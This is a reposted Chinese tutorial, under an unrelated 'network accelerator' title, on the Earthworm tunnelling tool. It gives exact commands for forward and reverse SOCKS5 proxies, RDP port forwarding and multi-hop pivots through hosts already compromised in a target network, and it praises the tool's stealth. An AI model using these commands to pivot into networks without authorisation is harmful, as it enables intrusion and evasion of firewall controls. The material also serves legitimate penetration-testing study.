首页 抖音真文案网文章正文

外网加速(外网加速器试用1天)

抖音真文案网 2022年07月23日 08:24 124 admin

工欲善其事,必先利其器;本期,为大家介绍款内网漫游“打洞”神器Earthworm,强烈推荐给对内网漫游有需求的朋友们!

外网加速(外网加速器试用1天)

一、工具介绍

Earthworm(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。

该工具体积小,提供了多种可执行文件,以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持,可在多种复杂的网络环境下完成网络穿透。

支持平台列表:

图1

工具文件:

图2

工具下载官网:http://rootkiter.com/EarthWorm/

二、命令格式

下面以Win版本(使用ew_for_Win.exe)为例,其他平台版本用法相同(如在Linux32上使用,即用ew_for_Linux32)。

图3

-h 查看帮助

-s 指定链路状态(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、 lcx_tran)

ssocksd:正向socks5代理连接;

rcsocks、rssocks:反向socks5代理连接;

lcx_slave、lcx_listen:端口转发;

lcx_tran:端口映射;

-l 开放指定端口监听;

-d 指定转发或反弹的主机地址;

-e 指定转发或反弹的主机端口;

-f 指定连接或映射的主机地址;

-g 指定连接或映射的主机端口;

-t 设置超时时间,默认为10000毫秒,即10秒(单位毫秒,-h显示有误);

-v 显示版本;

-a 显示关于页面;

三、基本功能实现

1、SOCKS5代理

EW支持正向和反向socks5代理连接。

(1).正向socks5代理(适用于目标拥有公网ip且可任意开监听端口):

a) ew -s ssocksd -l 1080

移除点击此处添加图片说明文字

图4

在公网主机1.1.1.1上运行并开启端口为1080的socks5代理。

b)通过proxifier等代理工具访问1.1.1.1:1080使用1.1.1.1主机提供的socks5代理服务。

(2). 反向socks5代理(适用于目标无公网ip但可访问外网):

a) ew -s rcsocks -l 1080 -e 8888(经测试发现,将rcsocks改成lcx_listen也同样有效)

移除点击此处添加图片说明文字

图5

在公网主机上添加转接隧道,将1080端口收到的代理请求转交给反弹到8888端口的主机。

b) ew -s rssocks -d 1.1.1.1 -e 8888

移除点击此处添加图片说明文字

图6

在目标主机上开启socks5代理并反向连接到公网主机1.1.1.1的8888端口上。

c) 倘若反弹成功,则将在公网cmd上显示如下:

移除点击此处添加图片说明文字

图7

d) 通过proxifier等代理工具访问1.1.1.1:1080使用rssocks主机提供的socks5代理服务。

2、端口转发

lcx身为经典转发工具,其用法和效果不言而喻。

移除点击此处添加图片说明文字

图8

EW同样具备lcx所拥有的功能,使用如下,例如:

a) ew -s lcx_listen -e 1234 -l 8888(此时开启监听1234、8888端口,习惯lcx的可以-e在前,-l在后);

移除点击此处添加图片说明文字

外网加速(外网加速器试用1天)

图9

在公网主机1.1.1.1上添加转接隧道,将8888端口收到的代理请求,转交给反连1234端口的主机,或者按lcx理解:监听slave请求的1234端口并将数据转发到8888端口。

b) ew -s lcx_slave -d 1.1.1.1 -e 1234 -f 127.0.0.1 -g 3389(127.0.0.1可改成目标主机可访问的其他ip)

移除点击此处添加图片说明文字

图10

将目标ip的3389端口转发到公网主机1.1.1.1的1234端口上。

c)倘若转发成功,则在公网cmd上显示如下:

移除点击此处添加图片说明文字

图11

d) mstsc连接1.1.1.1:8888,即可连接到目标的3389。

最后值得一提的是,当停止lcx_listen进程时,相对应的lcx_slave进程也将随之停止,大大增强了安全性和隐蔽性,避免了断网和其他异常操作的尴尬。反向socks5代理同理。

3、端口映射

同理,端口映射使用如下:

a) ew -s lcx_tran -l 12345 -f 127.0.0.1 -g 3389(127.0.0.1可改成目标主机可访问的其他ip)

移除点击此处添加图片说明文字

图12

将请求的12345端口数据映射到目标的3389端口。

b) mstsc连接1.1.1.1:12345,即可连接到目标的3389远程桌面。

四、多重网络环境穿透

1、二重网络环境-1

假设获得目标网络内两台主机A(2.2.2.2)、B(2.2.2.3)的权限,情况描述如下:

A主机:存在公网 IP,且自由监听任意端口,无法访问特定资源。

B主机:目标网络内部主机,可访问特定资源,但无法访问公网。

A主机可直连B主机。

对于此类情况,可采用正向socks5代理+端口映射方式进行内网穿透。

a) ew -s ssocksd -l 8888

移除点击此处添加图片说明文字

图13

在B主机上运行并开启端口为8888的socks5正向代理。

b) ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 8888

移除点击此处添加图片说明文字

图14

在A主机上运行将请求的1080端口数据,映射到目标2.2.2.3的8888端口;

c)通过proxifier等代理工具访问2.2.2.2:1080,使用2.2.2.3主机提供的socks5代理服务。

2、二重网络环境-2

假设获得目标网络内两台主机A(2.2.2.2)、B(2.2.2.3)的权限,公网主机(1.1.1.1),情况描述如下:

A主机:目标网络的边界主机,无公网 IP,无法访问特定资源,可访问外网。

B主机:目标网络内部主机,可访问特定资源,却无法回连公网。

A主机可直连B主机。

此类情况与上一个环境不同的是A主机无公网IP,此时可采用正向socks5代理+端口转发方式进行内网穿透。

a) ew -s lcx_listen -e 8888 -l 1080

图15

在公网主机1.1.1.1上添加转接隧道,将1080端口收到的代理请求转交给反连8888端口的主机,或者按lcx理解:监听slave请求的8888端口并将数据转发到1080端口。

b) ew -s ssocksd -l 9999

图16

在B主机上运行并开启端口为9999的socks5正向代理。

c) ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

图17

将B主机的9999端口转发到公网主机1.1.1.1的8888端口上。打通1.1.1.1:8888 和2.2.2.3:9999之间的通讯隧道,使其连接起来。

d)通过proxifier等代理工具访问1.1.1.1:1080使用2.2.2.3主机提供的socks5代理服务。

3、三重网络环境

假设获得目标网络内三台主机A(2.2.2.2)、B(2.2.2.3)、C(2.2.2.4)的权限,公网主机(1.1.1.1),情况描述如下:

A主机:目标网络的边界主机,无公网 IP,无法访问特定资源,可访问外网。

B主机:目标网络内部主机,无法访问特定资源,无法回连公网。

C主机:目标网络内部主机,可访问特定资源,无法回连公网。

A主机可直连B主机,B主机可直连C主机。

此类环境遇到较少且复杂,但可采用反向socks5代理+端口转发方式进行内网穿透。

a) ew -s rcsocks -l 1080 -e 8888

图18

在公网主机1.1.1.1上添加转接隧道,将1080端口收到的代理请求转交给反弹到8888端口的主机。

b) ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

移除点击此处添加图片说明文字

图19

在A主机上运行,将B主机的9999端口转发到公网主机1.1.1.1的8888端口上。 打通1.1.1.1:8888和2.2.2.3:9999之间的通讯隧道,使其连接起来。

c) ew -s lcx_listen -l 9999 -e 7777

图20

在B主机上添加转接隧道,将9999端口收到的代理请求转交给反连7777端口的主机。

d) ew -s rssocks -d 2.2.2.3 -e 7777

图21

在C主机上开启socks5代理并反向连接到B主机2.2.2.3的7777端口上;

e)通过proxifier等代理工具访问1.1.1.1:1080,使用rssocks主机提供的socks5代理服务。数据流向为socks5代理-> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

Earthworm不仅具备socks5的功能,还具备反弹式socks代理和lcx端口转发、映射的全部功能(listen、tran、slave)。以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。

同时提供了多种可执行文件,以适用不同平台间的转接通讯(如Linux、Windows、MacOS、Arm-Linux)。全程命令行操作,无GUI,方便快捷,适合渗透测试使用。

发表评论

陕ICP备2022006270号-1 网站地图 抖音真文案网